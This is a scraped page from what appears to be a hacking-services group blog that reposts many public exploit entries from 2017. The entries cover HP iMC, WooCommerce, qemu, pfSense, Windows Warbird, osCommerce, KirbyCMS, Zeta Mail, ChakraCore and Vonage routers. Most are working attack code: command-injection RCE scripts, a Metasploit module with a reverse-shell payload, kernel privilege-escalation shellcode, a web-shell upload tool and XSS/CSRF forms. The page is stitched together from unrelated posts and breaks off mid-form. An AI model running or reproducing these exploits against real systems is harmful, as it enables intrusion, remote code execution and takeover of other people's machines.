#!/opt/local/bin/python2.7
# Exploit Title: HP iMC Plat 7.2 dbman Opcode 10008 Command Injection RCE
# Date: 11-29-2017
# Exploit Author: Chris Lyne (@lynerc)
# Vendor Homepage: www.hpe.com
# Software Link: https://h10145.www1.hpe.com/Downloads/DownloadSoftware.aspx?SoftwareReleaseUId=16759&ProductNumber=JG747AAE&lang=en&cc=us&prodSeriesId=4176535&SaidNumber=
# Version: iMC PLAT v7.2 (E0403) Standard
# Tested on: Windows Server 2008 R2 Enterprise 64-bit
# CVE : CVE-2017-5816
# See Also: http://www.zerodayinitiative.com/advisories/ZDI-17-340/
# note that this PoC will create a file 'C:\10008.txt'
from pyasn1.type.univ import *
from pyasn1.type.namedtype import *
from pyasn1.codec.ber import encoder
import struct
import binascii
import socket, sys
ip = '192.168.1.74'
port = 2810
payload = "whoami > C:\\10008.txt"
opcode = 10008
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ip, port))
class DbmanMsg(Sequence):
componentType = NamedTypes(
NamedType('dbIp', OctetString()),
NamedType('iDBType', Integer()),
NamedType('dbInstance', OctetString()),
NamedType('dbSaUserName', OctetString()),
NamedType('dbSaPassword', OctetString()),
NamedType('strOraDbIns', OctetString())
)
msg = DbmanMsg()
msg['dbIp'] = ip
msg['iDBType'] = 4
msg['dbInstance'] = "a\"& " + payload + " &"
msg['dbSaUserName'] = "b"
msg['dbSaPassword'] = "c"
msg['strOraDbIns'] = "d"
encodedMsg = encoder.encode(msg, defMode=True)
msgLen = len(encodedMsg)
values = (opcode, msgLen, encodedMsg)
s = struct.Struct(">ii%ds" % msgLen)
packed_data = s.pack(*values)
sock.send(packed_data)
sock.close()
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863147350
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
#!/usr/bin/python
buffer = b"http://"
buffer += b"\x41" * 1500
f=open("player.m3u","wb")
f.write(buffer)
f.close()
# Exploit Title: WordPress woocommerce directory traversal
# Date: 28-11-2017
# Software Link: https://wordpress.org/plugins/woocommerce/
# Exploit Author:fu2x2000
# Contact: fu2x2000@gmail.com
# Website:
# CVE:2017-17058
#Version:Tested on WordPress 4.8.3 woocommerce 2.0/3.0
# Category: webapps
1. Description
Identifying woo commerce theme pluging properly sanitized against Directory
Traversal,even the latest version of WordPress with woocommerce can be
vulnerable.
2. Proof of Concept
$woo = "www/wp-content/plugins/woocommerce/templates/emails/plain/"; `
function file_get_contents_utf8($fn) {
$opts = array(
'http' => array(
'method'=>"GET",
'header'=>"Content-Type: text/html; charset=utf-8"
)
);
$wp = stream_context_create($opts);
$result = @file_get_contents($fn,false,$wp);
return $result;
}
/* $head= header("Content-Type: text/html; charset=utf-8"); ; */
header("Content-Type: text/html; charset=utf-8");
$result = file_get_contents_utf8("http://".$woo);
echo $result;
Regards
Fu2x200
#!/opt/local/bin/python2.7
# Exploit Title: HP iMC Plat 7.2 dbman Opcode 10007 Command Injection RCE
# Date: 11-28-2017
# Exploit Author: Chris Lyne (@lynerc)
# Vendor Homepage: www.hpe.com
# Software Link: https://h10145.www1.hpe.com/Downloads/DownloadSoftware.aspx?SoftwareReleaseUId=16759&ProductNumber=JG747AAE&lang=en&cc=us&prodSeriesId=4176535&SaidNumber=
# Version: iMC PLAT v7.2 (E0403) Standard
# Tested on: Windows Server 2008 R2 Enterprise 64-bit
# CVE : CVE-2017-5817
# See Also: http://www.zerodayinitiative.com/advisories/ZDI-17-341/
# note that this PoC will create a file 'C:\poc.txt'
import socket, sys
ip = '192.168.1.74'
port = 2810
command = "echo PoC 12345 > C:\\poc.txt" # command to run
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ip, port))
buf = "\x00\x00\x27\x17\x00\x00\x00"
buf += chr(109 + 10 + len(command))
buf += "\x30\x81"
buf += chr(109 + 7 + len(command))
buf += "\x04\x0c"
buf += ip
buf += ("\x04\x04\x41\x41\x41\x41\x04"
"\x04\x42\x42\x42\x42\x04\x04\x43\x43\x43\x43\x02\x01\x01\x02\x01"
"\x03\x04\x06\x4d\x41\x4e\x55\x41\x4c\x04\x04\x44\x44\x44\x44\x04")
buf += chr(len(command) + 7)
buf += "\x73\x61\x22\x26\x20"
buf += command
buf += ("\x20\x26\x04\x08\x70\x61\x73\x73\x77\x6f\x72\x64\x04"
"\x04\x00\x00\x04\x57\x04\x08\x69\x6e\x73\x74\x61\x6e\x63\x65\x04"
"\x04\x45\x45\x45\x45\x04\x04\x46\x46\x46\x46\x04\x04\x47\x47\x47"
"\x47\x04\x04\x48\x48\x48\x48\x30\x00\x02\x01\x01")
sock.send(buf)
sock.close()
Introduced in commit f37708f6b8 (2.10). The NBD spec says a client
can request export names up to 4096 bytes in length, even though
they should not expect success on names longer than 256. However,
qemu hard-codes the limit of 256, and fails to filter out a client
that probes for a longer name; the result is a stack smash that can
potentially give an attacker arbitrary control over the qemu
process.
The smash can be easily demonstrated with this client:
$ qemu-io f raw nbd://localhost:10809/$(printf %3000d 1 | tr ' ' a)
If the qemu NBD server binary (whether the standalone qemu-nbd, or
the builtin server of QMP nbd-server-start) was compiled with
-fstack-protector-strong, the ability to exploit the stack smash
into arbitrary execution is a lot more difficult (but still
theoretically possible to a determined attacker, perhaps in
combination with other CVEs). Still, crashing a running qemu (and
losing the VM) is bad enough, even if the attacker did not obtain
full execution control.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(
update_info(
info,
'Name' => 'pfSense authenticated group member RCE',
'Description' => %q(
pfSense, a free BSD based open source firewall distribution,
version <= 2.3.1_1 contains a remote command execution
vulnerability post authentication in the system_groupmanager.php page.
Verified against 2.2.6 and 2.3.
),
'Author' =>
[
's4squatch', # discovery
'h00die' # module
],
'References' =>
[
[ 'EDB', '43128' ],
[ 'URL', 'https://www.pfsense.org/security/advisories/pfSense-SA-16_08.webgui.asc']
],
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Privileged' => false,
'DefaultOptions' =>
{
'SSL' => true,
'PAYLOAD' => 'cmd/unix/reverse_openssl'
},
'Arch' => [ ARCH_CMD ],
'Payload' =>
{
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'perl openssl'
}
},
'Targets' =>
[
[ 'Automatic Target', {}]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Nov 06 2017'
)
)
register_options(
[
OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
OptString.new('PASSWORD', [ false, 'Password to login with', 'pfsense']),
Opt::RPORT(443)
], self.class
)
end
def login
res = send_request_cgi(
'uri' => '/index.php',
'method' => 'GET'
)
fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 200
/var csrfMagicToken = "(?<csrf>sid:[a-z0-9,;:]+)";/ =~ res.body
fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine CSRF token") if csrf.nil?
vprint_status("CSRF Token for login: #{csrf}")
res = send_request_cgi(
'uri' => '/index.php',
'method' => 'POST',
'vars_post' => {
'__csrf_magic' => csrf,
'usernamefld' => datastore['USERNAME'],
'passwordfld' => datastore['PASSWORD'],
'login' => ''
}
)
unless res
fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to authentication request")
end
if res.code == 302
vprint_status('Successful Authentication')
return res.get_cookies
else
fail_with(Failure::UnexpectedReply, "#{peer} - Authentication Failed: #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
return nil
end
end
def detect_version(cookie)
res = send_request_cgi(
'uri' => '/index.php',
'method' => 'GET',
'cookie' => cookie
)
unless res
fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to authentication request")
end
/Version.+<strong>(?<version>[0-9\.\-RELEASE]+)[\n]?<\/strong>/m =~ res.body
if version
print_status("pfSense Version Detected: #{version}")
return Gem::Version.new(version)
end
# If the device isn't fully setup, you get stuck at redirects to wizard.php
# however, this does NOT stop exploitation strangely
print_error("pfSens Version Not Detected or wizard still enabled.")
Gem::Version.new('0.0')
end
def check
begin
res = send_request_cgi(
'uri' => '/index.php',
'method' => 'GET'
)
fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 200
if /Login to pfSense/ =~ res.body
Exploit::CheckCode::Detected
else
Exploit::CheckCode::Safe
end
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
end
end
def exploit
begin
cookie = login
version = detect_version(cookie)
vprint_good('Login Successful')
res = send_request_cgi(
'uri' => '/system_groupmanager.php',
'method' => 'GET',
'cookie' => cookie,
'vars_get' => {
'act' => 'new'
}
)
/var csrfMagicToken = "(?<csrf>sid:[a-z0-9,;:]+)";/ =~ res.body
fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine CSRF token") if csrf.nil?
vprint_status("CSRF Token for group creation: #{csrf}")
group_name = rand_text_alpha(10)
post_vars = {
'__csrf_magic' => csrf,
'groupname' => group_name,
'description' => '',
'members[]' => "0';#{payload.encoded};'",
'groupid' => '',
'save' => 'Save'
}
if version >= Gem::Version.new('2.3')
post_vars = post_vars.merge('gtype' => 'local')
elsif version <= Gem::Version.new('2.3') # catch for 2.2.6. left this elsif for easy expansion to other versions as needed
post_vars = post_vars.merge(
'act' => '',
'gtype' => '',
'privid' => ''
)
end
send_request_cgi(
'uri' => '/system_groupmanager.php',
'method' => 'POST',
'cookie' => cookie,
'vars_post' => post_vars,
'vars_get' => {
'act' => 'edit'
}
)
print_status("Manual removal of group #{group_name} is required.")
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
end
end
end
/*
EDB Note
Source ~ https://gist.github.com/xpn/736daa4d1ff7b9869f4b3d1e9a34d315/ff2e2465d4a07588d0148dc87e77b17b41ef9d1d
Source ~ https://blog.xpnsec.com/windows-warbird-privesc/
Source ~ https://github.com/xpn/warbird_exploit
Ref ~ https://bugs.chromium.org/p/project-zero/issues/detail?id=1391
*/
// Shellcode to be executed by exploit
const char shellcode[256] = {
0xc7, 0x43, 0x04, 0x00, 0x00, 0x00, 0x00, 0x81, 0xc4, 0x0c,
0x00, 0x00, 0x00, 0x81, 0xc4, 0x04, 0x00, 0x00, 0x00, 0x5f,
0x5e, 0x5b, 0x89, 0xec, 0x5d, 0x81, 0xc4, 0x0c, 0x00, 0x00,
0x00, 0x81, 0xc4, 0x04, 0x00, 0x00, 0x00, 0x5e, 0x5b, 0x5f,
0x89, 0xec, 0x5d, 0x81, 0xc4, 0x04, 0x00, 0x00, 0x00, 0x81,
0xc4, 0x04, 0x00, 0x00, 0x00, 0x5f, 0x5e, 0x5b, 0x89, 0xec,
0x5d, 0x81, 0xc4, 0x04, 0x00, 0x00, 0x00, 0x81, 0xc4, 0x04,
0x00, 0x00, 0x00, 0x5f, 0x5f, 0x5e, 0x5b, 0x89, 0xec, 0x5d,
0x60, 0x64, 0xa1, 0x24, 0x01, 0x00, 0x00, 0xc7, 0x80, 0x3e,
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x80, 0xe8,
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x80, 0xec,
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x80, 0xf0,
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x80, 0xf4,
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x80, 0xf8,
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x80, 0xfc,
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x80, 0x50,
0x01, 0x00, 0x00, 0x81, 0xb8, 0x7c, 0x01, 0x00, 0x00, 0x63,
0x6d, 0x64, 0x2e, 0x74, 0x0d, 0x8b, 0x80, 0xb8, 0x00, 0x00,
0x00, 0x2d, 0xb8, 0x00, 0x00, 0x00, 0xeb, 0xe7, 0x89, 0xc3,
0x81, 0xb8, 0xb4, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00,
0x74, 0x0d, 0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x2d, 0xb8,
0x00, 0x00, 0x00, 0xeb, 0xe7, 0x8b, 0x88, 0xfc, 0x00, 0x00,
0x00, 0x89, 0x8b, 0xfc, 0x00, 0x00, 0x00, 0x61, 0xc3, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff
};
void exploit(void) {
BYTE Buffer[8];
DWORD BytesReturned;
RtlZeroMemory(Buffer, sizeof(Buffer));
NtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)185, Buffer, sizeof(Buffer), &BytesReturned);
// Copy our shellcode to the NULL page
RtlCopyMemory(NULL, shellcode, 256);
RtlZeroMemory(Buffer, sizeof(Buffer));
NtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)185, Buffer, sizeof(Buffer), &BytesReturned);
}
BOOL APIENTRY DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
exploit();
break;
}
return TRUE;
}
# Exploit Title: osCommerce 2.3.4.1 Authenticated Arbitrary File Upload
# Date: 11.11.2017
# Exploit Author: Simon Scannell - https://scannell-infosec.net <contact@scannell-infosec.net>
# Vendor Homepage: https://www.oscommerce.com/
# Software Link: https://www.oscommerce.com/Products&Download=oscom234
# Version: 2.3.4.1, 2.3.4 - Other versions have not been tested but are likely to be vulnerable
# Tested on: Linux, Windows
"""
osCommerce does by default not allow Users to upload arbitrary files from the Admin Panel. However, any user
being privileged enough to send newsletters can exploit an objection injection in the osCommerce core to
upload any file, allowing the user to gain shell access. The user does not need to be an administrator,
any account with access to the newsletters will do.
More details can be found here:
https://scannell-infosec.net/uploading-a-shell-from-within-the-oscommerce-admin-panel-via-object-injection/
"""
import urlparse
import argparse
import sys
import requests
DEFAULT_ADMIN_URL = "/catalog/admin/"
DEFAULT_NEWSLETTER_SCRIPT = "/catalog/admin/newsletters.php"
# Builds an authenticated session and returns it if it was successful
def authenticate(username, password, url):
# Build the Session and grab the inital cookie
session = requests.Session()
session.get(url + "login.php", allow_redirects=False)
get_params = {'action': "process"}
data = {"username": username, "password": password}
# Attempt the authentication
r = session.post(url + "login.php", data=data, params=get_params, allow_redirects=False)
if r.status_code == 302:
return session
else:
return False
def upload_file(local_filename, session, url):
newsletter_script = url + "newsletters.php"
r = session.get(newsletter_script, params={"action": "new"})
payload = {
'module': 'upload',
'title': 'uploaded_fname',
'content': './'
}
# Create the vulnerable newsletter and grab its ID
r = session.post(newsletter_script, params={"action": "insert"}, data=payload, allow_redirects=False)
try:
newsletter_id = urlparse.urlparse(r.headers['Location']).query[4:]
print "[+] Successfully prepared the exploit and created a new newsletter with nID %s" % (newsletter_id)
except:
print "[-] The script wasn't able to create a new newsletter"
exit(1)
# Now lock the newsletter
r = session.post(newsletter_script, params={"action": "lock", "nID": newsletter_id})
print "[+] Successfully locked the newsletter. Now attempting to upload.."
# Send the final request, containing the file!
files = {
'uploaded_fname': open(local_filename)
}
r = session.post(newsletter_script, params={"action": "send", "nID": newsletter_id}, files=files)
print "[*] Now trying to verify that the file %s uploaded.." % (local_filename)
shell_url = url + local_filename
r = requests.get(shell_url)
print "[+] Got a HTTP 200 Reply for the uploaded file!"
print "[+] The uploaded file should now be available at %s" % (shell_url)
# Main Routine starts here
usage = " %s -u TARGET_URL -a AUTH -f FILE [-p ADMIN_PATH]\n\n" \
"Example: %s -u http://localhost/path/to/osCommerce --auth=admin:admin_password -f shell.php\n\n" \
"NOTE: For a more detailed description on the arguments use the -h switch\n\n\n" % (sys.argv[0], sys.argv[0])
parser = argparse.ArgumentParser(description='\n\nosCommerce 2.3.4 Authenticated Arbitrary File Upload', usage=usage)
parser.add_argument('-u', '--target-url', help='The target URL, including the path to the osCommerce installation (can also be document root /)', required=True)
parser.add_argument('-a', '--auth', help='Credentials for a privileged user in the format of username:password', required=True)
parser.add_argument('-f', '--file', help="The local file to be uploaded to the vulnerable webhost", required=True)
parser.add_argument('-p', '--admin-path', help="The path for the osCommerce Admin Area. This defaults to /catalog/admin/", required=False)
args = parser.parse_args()
# Parse username and password
username = args.auth.split(":")[0]
password = args.auth.split(":")[1]
url = args.target_url
# If the user hasn't passed a path to the osCommerce Admin Panel, use the default
if not args.admin_path:
url += DEFAULT_ADMIN_URL
else:
url += args.admin_path
# Authenticate the user and establish the connection
session = authenticate(username, password, url)
if not session:
print "[-] The script wasn't able to authenticate itself to osCommerce. Are you sure that the credentials are correct? Is %s the Admin Path?" % (url + "login.php")
exit(1)
else:
print "[+] Authentication successful"
upload_file(args.file, session, url)
# Exploit Title: KirbyCMS <2.5.7 Stored Cross Site Scripting
# Vendor Homepage: https://getkirby.com/
# Software Link: https://getkirby.com/try
# Discovered by: Ishaq Mohammed
# Contact: https://twitter.com/security_prince
# Website: https://about.me/security-prince
# Category: webapps
# Platform: PHP
# CVE: CVE-2017-16807
1. Description
A cross-site Scripting (XSS) vulnerability in Kirby Panel before 2.3.3, 2.4.x before 2.4.2, and 2.5.x before 2.5.7 exists when displaying a specially prepared SVG document that has been uploaded as a content file.
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16807
2. Proof of Concept
Steps to Reproduce:
Log in as an Editor and click on Site Options
Add the malicious .svg file which contains the javascript to the Site
Login to another browser with Admin Credentials.
Click on Site Options.
Click on the newly added .svg file
3. Reference
https://securityprince.blogspot.in/2017/11/cve-2017-16807-kirby-cms-257-cross-site.html
https://getkirby.com/changelog/kirby-2-5-7
4. Solution
The vulnerability is patched by the vendor in the version 2.5.7.
Vendor: Zeta Components
module: Mail, <= 1.8.1
Published: November 12nd, 2017
Reported by: Kay
CVE-2017-15806
Overview
Zeta Components are a high quality, general purpose library of loosly coupled components for development of applications based on PHP 5. An issue was discovered in the Mail package for Zeta Components. It’s possible to exploit this vulnerability to execute arbitrary shell commands on the remote server.
Detail
This vulnerability is on send method in ezcMailMtaTransport class.
In /src/transports/mta/mta_transport.php at line 73, send() method use PHP mail() method to deliver email, while PHP use sendmail as default MTA. When mail() method is called, the 5th parameter is $additionalParameters , this parameter can pass extra param to sendmail. As the code shown, it is assigned by this line:
$additionalParameters = "-f{$mail->returnPath->email}”;
If attacker assign email address like:
'kay_malwarebenchmark@outlook.com -X/var/www/html/cache/exploit.php'
and inject payload in mail body, sendmail will transfer log(-X) into /var/www/html/cache/exploit.php. The resulting file will contain the payload passed in the body of the email, that can then be accessed and run through domainname/cache/exploit.php.
To summary, it is possible if all of these conditions are true:
- you use the ezcMailMtaTransport
- your “sendmail” binary allows the -X flag to be set, which is not the case for exim4 and postfix, as they don’t support that argument
- your wwwroot is writable by the user your webserver is running at the input to use for the ezcMailAddress that is assigned to the returnPath property is not properly escaped
PoC
use Mail\mail;
$mail = new ezcMail();
$mail->returnPath = new ezcMailAddress('kay_malwarebenchmark@outlook.com -X/var/www/html/cache/exploit.php');
$mail->addTo( new ezcMailAddress('some one'));
$mail->subject = "Mail PoC Exploit";
$mail->body = new ezcMailText("<?php phpinfo(); ?>");
$transport = new ezcMailMtaTransport();
$transport->send($mail);
Remediation
Upgrade Mail to 1.8.2
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1357
function opt(a, b, v) {
if (b.length < 1)
return;
for (let i = 0; i < a.length; i++)
a[i] = v;
b[0] = 2.3023e-320;
}
The above JavaScript code is JITed as follows:
... CHECKING THE TYPE OF B ...
OP_Memset(a, v, a.length);
b[0] = 2.3023e-320;
But there's no ImplicitCallFlags checks around OP_Memset. So it fails to detect if the type of "b" was changed after the "OP_Memset" called.
The PoC shows that it can result in type confusion.
PoC:
*/
function opt(a, b, v) {
if (b.length < 1)
return;
for (let i = 0; i < a.length; i++)
a[i] = v;
b[0] = 2.3023e-320;
}
function main() {
for (let i = 0; i < 1000; i++) {
opt(new Uint8Array(100), [1.1, 2.2, 3.3], {});
}
let a = new Uint8Array(100);
let b = [1.1, 2.2, 3.3];
opt(a, b, {
valueOf: () => {
b[0] = {};
return 0;
}
});
print(b[0]);
}
main();
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1343
Here's a snippet of the method.
void Lowerer::LowerBoundCheck(IR::Instr *const instr)
{
...
if(rightOpnd->IsIntConstOpnd())
{
IntConstType newOffset;
if(!IntConstMath::Add(offset, rightOpnd->AsIntConstOpnd()->GetValue(), &newOffset)) <<--- (a)
{
offset = newOffset;
rightOpnd = nullptr;
offsetOpnd = nullptr;
}
}
...
if(!rightOpnd)
{
rightOpnd = IR::IntConstOpnd::New(offset, TyInt32, func);
}
}
At (a), it uses "IntConstMath::Add" to check integer overflow. But the size of IntConstType equals to the size of pointer, and the "offset" variable is used as a 32-bit integer. So it may fail to check integer overflow on 64-bit system.
PoC:
*/
function f() {
let arr = new Uint32Array(0x1000);
for (let i = 0; i < 0x7fffffff;) {
arr[++i] = 0x1234;
}
}
f();
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1341&desc=3
Let's start with a switch statement and its IR code for JIT.
JS:
for (let i = 0; i <; 100; i++) {
switch (i) {
case 2:
case 4:
case 6:
case 8:
case 10:
case 12:
case 14:
case 16:
case 18:
case 20:
case 22:
case 24:
case 26:
case 28:
case 30:
case 32:
case 34:
case 36:
case 38:
break;
}
}
IRs before Type Specialization:
s26.var = Ld_A s24.var - "i" #0011 Bailout: #0011 (BailOutExpectingInteger)
BrLt_A $L2, s26.var, s5.var #0070
$L9: #0070
BrGt_A $L2, s26.var, s23.var #0070
$L8: #0070
s28.var = Sub_A s26.var, 2 (0x2).i32 #0070 // Because of the minimum case is 2, subtracting 2 from i. s28 is a temporary variable.
MultiBr ..., s28.var #0070
IRs after Type Specialization:
s52(s26).i32 = Ld_A s51(s24).i32 - "i" #0011
BrLt_I4 $L2, s51(s24).i32, 2 (0x2).i32 #0070
$L9: #0070
BrGt_I4 $L2, s51(s24).i32, 38 (0x26).i32 #0070
$L8: #0070
s53(s28).i32 = Sub_I4 s51(s24).i32, 2 (0x2).i32 #0070
MultiBr ..., s53(s28).i32! #0070
MultiBr instructions' offset operand(s28 in the above) must be of type Int32. If not, type confusion will occur. The way to ensure it is to use BailOutExpectingInteger.
In the above code, "s26" is ensured to be of type Int32 by the bailout. So, the other variables affected by "s26" including the offset variable "s28" are also ensured to be of type Int32.
What I noticed is "s28.var = Sub_A s26.var, 2 (0x2).i32". If we declare a variable "j" with "i - 2", the offset variable "s28" will be replaced with "j" in the CSE phase.
JS:
for (let i = 0; i < 100; i++) {
let j = i - 2;
switch (i) {
case 2:
case 4:
case 6:
case 8:
case 10:
case 12:
case 14:
case 16:
case 18:
case 20:
case 22:
case 24:
case 26:
case 28:
case 30:
case 32:
case 34:
case 36:
case 38:
break;
}
}
IR:
Line 3: let j = i - 2;
Col 9: ^
StatementBoundary #2 #0013
s55(s28).i32 = Sub_I4 s54(s24).i32, 2 (0x2).i32 #0013
Line 4: switch (i) {
Col 9: ^
StatementBoundary #3 #001a // BailOutExpectingInteger
BrLt_I4 $L2, s54(s24).i32, 2 (0x2).i32 #0079
BrGt_I4 $L2, s54(s24).i32, 38 (0x26).i32 #0079
MultiBr ..., s55(s28).i32! #0079
The offset variable is replaced with "j" that is not ensured to be of type Int32.
CORRECTION: The bug was that it tried to ensure the type using BailOutExpectingInteger, even if "i" was not always of type Int32. It was bypassed with the CSE phase. So if we created a case where "j" couldn't be of type Int32, type confusion occurred.
JS:
for (let i = 0; i < 100; i++) {
let j = i - 2;
switch (i) {
case 2:
case 4:
case 6:
case 8:
case 10:
case 12:
case 14:
case 16:
case 18:
case 20:
case 22:
case 24:
case 26:
case 28:
case 30:
case 32:
case 34:
case 36:
case 38:
break;
}
if (i == 39)
i = 'aaaa';
}
IR:
Line 3: let j = i - 2;
Col 9: ^
StatementBoundary #2 #0013
s30[LikelyCanBeTaggedValue_Int].var = Sub_A s26[LikelyCanBeTaggedValue_Int_Number].var, 0x1000000000002.var #0013
s27[LikelyCanBeTaggedValue_Int].var = Ld_A s30[isTempLastUse][LikelyCanBeTaggedValue_Int].var! #0017
Line 4: switch (i) {
Col 9: ^
StatementBoundary #3 #001a
s63(s26).i32 = FromVar s26[LikelyCanBeTaggedValue_Int_Number].var #001a Bailout: #001a (BailOutExpectingInteger)
BrLt_I4 $L4, s63(s26).i32, 2 (0x2).i32 #0079
BrGt_I4 $L4, s63(s26).i32, 38 (0x26).i32 #0079
MultiBr ..., s27[LikelyCanBeTaggedValue_Int].var #0079
It ended up to use "j" of type Var as the offset variable.
PoC:
*/
function opt() {
for (let i = 0; i < 100; i++) {
let j = i - 2;
switch (i) {
case 2:
case 4:
case 6:
case 8:
case 10:
case 12:
case 14:
case 16:
case 18:
case 20:
case 22:
case 24:
case 26:
case 28:
case 30:
case 32:
case 34:
case 36:
case 38:
break;
}
if (i == 90) {
i = 'x';
}
}
}
function main() {
for (let i = 0; i < 100; i++) {
opt();
}
}
main();
/*
Crash Log:
RAX: 0x1
RBX: 0x7ffff7e04824 --> 0x100000000
RCX: 0x3
RDX: 0x7ffff0b20667 (loope 0x7ffff0b2066d)
RSI: 0x80000001
RDI: 0x7ffff0c182a0 --> 0x7ffff6478a10 --> 0x7ffff5986230 (<Js::DynamicObject::Finalize(bool)>: push rbp)
RBP: 0x7fffffff2130 --> 0x7fffffff21b0 --> 0x7fffffff2400 --> 0x7fffffff2480 --> 0x7fffffff24d0 --> 0x7fffffff52f0 (--> ...)
RSP: 0x7fffffff20c0 --> 0x1111015500000002
RIP: 0x7ffff0b204da (mov rdx,QWORD PTR [rdx+r13*8])
R8 : 0x0
R9 : 0x0
R10: 0x7ffff0b20400 (movabs rax,0x555555879018)
R11: 0x206
R12: 0x7fffffff5580 --> 0x7ffff0ba0000 --> 0xeb021a471b4f1a4f
R13: 0x1000000000001 << Var 1
R14: 0x1000000000003
R15: 0x7ffff0c79040 --> 0x7ffff643c050 --> 0x7ffff5521130 (<Js::RecyclableObject::Finalize(bool)>: push rbp)
EFLAGS: 0x10297 (CARRY PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x7ffff0b204cb: cmp ecx,0x26
0x7ffff0b204ce: jg 0x7ffff0b204e1
0x7ffff0b204d0: movabs rdx,0x7ffff0b20667
=> 0x7ffff0b204da: mov rdx,QWORD PTR [rdx+r13*8]
0x7ffff0b204de: rex.W jmp rdx
We can simply think as follows.
Before the CSE phase:
Var j = ToVar(i - 2);
int32_t offset = i - 2;
jmp jump_table[offset];
After the CSE phase:
Var j = ToVar(i - 2);
jmp jump_table[j];
*/
# Exploit Title: Vonage Home Router – Stored Xss
# Date: 16/11/2017
# Exploit Author: Nu11By73
# Hardware Version: VDV-23: 115
# Software Version: 3.2.11-0.9.40
# CVE : CVE-2017-16843
NewKeyword Parameter:
1. Login to the router
2. Click advanced setup
3. Click parental controls
4. In the block these keywords text box enter: test”><script>alert(1)</script>
5. Click the add keyword button to receive the pop up.
NewDomain Parameter:
1. Login to the router
2. Click advanced setup
3. Click parental controls
4. In the block these websites text box enter: test”><script>alert(1)</script>
5. Click the add domain button to receive the pop up.
Proof of concept code:
NewDomain.html
<!—Note: The x and y values will need to be changed accordingly
<html>
<p>Authenticated Stored CSRF/XSS - Vonage Modem</p>
<form method="POST" action="http://192.168.15.1/goform/RgParentalBasic">
<input type="hidden" name="RemoveContentRule" value="0" />
<input type="hidden" name="AddContentRule" value="0" />
<input type="hidden" name="ContentRules" value="0" />
<input type="hidden" name="RuleSelect" value="0" / >
<input type="hidden" name="NewKeyword" value="" / >
<input type="hidden" name="KeywordAction" value="0" />
<input type="hidden" name="NewDomain" value="test'><script>alert(1)</script>" />
<input type="hidden" name="x" value="50" />
<input type="hidden" name="y" value="15" />
<input type="hidden" name="DomainAction" value="1" />
<input type="hidden" name="AllowedDomainAction" value="0" />
<input type="hidden" name="ParentalPassword" value="Broadcom" />
<input type="hidden" name="ParentalPasswordReEnter" value="Broadcom" />
<input type="hidden" name="AccessDuration" value="30" />
<input type="submit" title="Exploit" />
</form>
</html>
NewKeyword.html
<!—Note: The x and y values will need to be changed accordingly
<html>
<p>Authenticated Stored CSRF/XSS - Vonage Modem</p>
<form method="POST" action="http://192.168.15.1/goform/RgParentalBasic">
<input type="hidden" name="RemoveContentRule" value="0" />
<input type="hidden" name="AddContentRule" value="0" />
<input type="hidden" name="ContentRules" value="0" />
<input type="hidden" name="RuleSelect" value="0" / >
<input type="hidden" name="NewKeyword" value="test'><script>alert(1)</script>" / >
<input type="hidden" name="x" value="61" />
<input type="hidden" name="y" value="12" />
<input type="hidden" name="KeywordAction" value="1" />
<input type="hidden" name="NewDomain" value="" />
<input type="hidden" name="DomainAction" value="0" />
